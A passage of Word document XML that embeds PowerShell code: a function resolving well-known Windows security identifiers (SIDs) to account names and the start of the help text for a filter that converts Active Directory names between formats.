    </w:p>
    <w:p w14:paraId="7CFF0979" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1B51CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E2693" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBAADF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidatePattern('^S-1-.*')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB0D165" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435DE26A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C3C45E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0851050C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273B47FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SID2 = $SID.trim('*')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2845C2AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="174A33CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # try to resolve any built-in SIDs first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B207DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #   from https://support.microsoft.com/en-us/kb/243330</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE421DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch ($SID2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F41C2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-0'         { 'Null Authority' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE93AEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-0-0'       { 'Nobody' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77862408" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-1'         { 'World Authority' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70213F04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-1-0'       { 'Everyone' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467B5CE3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            'S-1-2'         { 'Local Authority' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A7419E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-2-0'       { 'Local' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8CF302" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-2-1'       { 'Console Logon ' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46537ECD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-3'         { 'Creator Authority' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3447AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-3-0'       { 'Creator Owner' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAEA372" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-3-1'       { 'Creator Group' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C11FF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-3-2'       { 'Creator Owner Server' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F3E827" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-3-3'       { 'Creator Group Server' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191DD419" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-3-4'       { 'Owner Rights' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285E71D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-4'         { 'Non-unique Authority' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4205C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5'         { 'NT Authority' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E4270A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-1'       { 'Dialup' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BA879F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-2'       { 'Network' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F1A232" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-3'       { 'Batch' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE84449" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-4'       { 'Interactive' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F90828F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-6'       { 'Service' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ED59DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-7'       { 'Anonymous' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9CD8FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-8'       { 'Proxy' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053D1EC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-9'       { 'Enterprise Domain Controllers' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D19879" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-10'      { 'Principal Self' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D322F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-11'      { 'Authenticated Users' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F027E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-12'      { 'Restricted Code' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D36C2A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-13'      { 'Terminal Server Users' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D620F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-14'      { 'Remote Interactive Logon' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BB6238" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-15'      { 'This Organization ' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B3EAEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-17'      { 'This Organization ' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1547F46B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-18'      { 'Local System' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04786572" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-19'      { 'NT Authority' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D87F36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-20'      { 'NT Authority' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21950852" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            'S-1-5-80-0'    { 'All Services ' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6CF320" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-544'  { 'BUILTIN\Administrators' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B7FB74" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-545'  { 'BUILTIN\Users' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3836491D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-546'  { 'BUILTIN\Guests' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159FAB50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-547'  { 'BUILTIN\Power Users' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297BE45F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-548'  { 'BUILTIN\Account Operators' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F4CEDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-549'  { 'BUILTIN\Server Operators' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB05FD5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-550'  { 'BUILTIN\Print Operators' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5931A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-551'  { 'BUILTIN\Backup Operators' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D324F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-552'  { 'BUILTIN\Replicators' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3D17D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-554'  { 'BUILTIN\Pre-Windows 2000 Compatible Access' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C7F788" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-555'  { 'BUILTIN\Remote Desktop Users' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466FFC3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-556'  { 'BUILTIN\Network Configuration Operators' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512C9636" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-557'  { 'BUILTIN\Incoming Forest Trust Builders' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368B7E98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-558'  { 'BUILTIN\Performance Monitor Users' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2084530E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-559'  { 'BUILTIN\Performance Log Users' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F72FEA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-560'  { 'BUILTIN\Windows Authorization Access Group' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A019D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-561'  { 'BUILTIN\Terminal Server License Servers' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0C50C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-562'  { 'BUILTIN\Distributed COM Users' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5982DB6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-569'  { 'BUILTIN\Cryptographic Operators' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2899E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-573'  { 'BUILTIN\Event Log Readers' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA3DF79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-574'  { 'BUILTIN\Certificate Service DCOM Access' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C0E82C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-575'  { 'BUILTIN\RDS Remote Access Servers' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549790D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-576'  { 'BUILTIN\RDS Endpoint Servers' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559C4C10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-577'  { 'BUILTIN\RDS Management Servers' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681EF859" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-578'  { 'BUILTIN\Hyper-V Administrators' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072A55D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-579'  { 'BUILTIN\Access Control Assistance Operators' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2ABA1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'S-1-5-32-580'  { 'BUILTIN\Access Control Assistance Operators' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4832FB85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Default { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E80970" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $Obj = (New-Object System.Security.Principal.SecurityIdentifier($SID2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBEEBA5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Obj.Translate( [System.Security.Principal.NTAccount]).Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D63109A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C80C0EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02765444" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108B541A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C26210B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Invalid SID: $SID"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCE8B4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C2B675" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DE63DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AA32C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5D6B1BAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="71113002" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Convert-ADName {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6BA21B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B36B682" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0464C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5C9A1D8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Converts user/group names from NT4 (DOMAIN\user) or domainSimple (user@domain.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6C712F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        to canonical format (domain.com/Users/user) or NT4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3ECC14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6A27D0FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Based on Bill Stewart's code from this article: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14895CD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BA8EC5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34041B65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ObjectName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9BC70A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F2F79D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The user/group name to convert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B61F136" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="776FA916" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER InputType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B6B698" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2987939A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        The InputType of the user/group name ("NT4","Simple","Canonical").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51363F21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2920BA11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER OutputType</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678EF949" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72FE60EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The OutputType of the user/group name ("NT4","Simple","Canonical").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D94428" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61188746" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A72FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7CE9C5E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Convert-ADName -ObjectName "dev\dfm"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F59E3AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267FEC2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns "dev.testlab.local/Users/Dave"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493E752" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="091DE306" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9B136D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A4529EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Convert-SidToName "S-..." | Convert-ADName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A65F6BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B76662" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the canonical name for the resolved SID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADFA082" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="101D6C14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
